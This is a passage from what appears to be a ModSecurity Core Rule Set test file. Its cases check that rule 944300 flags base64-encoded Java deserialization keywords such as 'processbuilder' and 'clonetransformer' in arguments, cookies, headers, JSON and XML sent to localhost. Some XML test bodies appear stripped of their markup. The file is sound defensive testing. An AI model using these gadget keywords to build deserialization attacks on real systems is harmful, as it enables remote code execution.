"Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-64 + desc: "Content-Type application/json arg value 
includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-65 + desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-66 + desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-67 + desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-68 + desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-69 + desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-70 + desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-71 + desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-72 + desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-73 + desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-74 + desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-75 + desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-76 + desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-77 + desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-78 + desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-79 + desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GNsb25ldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-80 + desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GNsb25ldHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-81 + desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GNsb25ldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-82 + desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-83 + desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-84 + desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-85 + desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: 
"HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-86 + desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-87 + desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-88 + desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + 
log_contains: "id \"944300\"" + - test_title: 944300-89 + desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-90 + desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-91 + desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BjbG9uZXRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-92 + desc: 
"Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-93 + desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-94 + desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-95 + desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-96 + desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-97 + desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-98 + desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-99 + desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-100 + desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-101 + desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" 
+ Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Zm9yY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-102 + desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Zm9yY2xvc3VyZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-103 + desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Zm9yY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-104 + desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-105 + desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-106 + desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 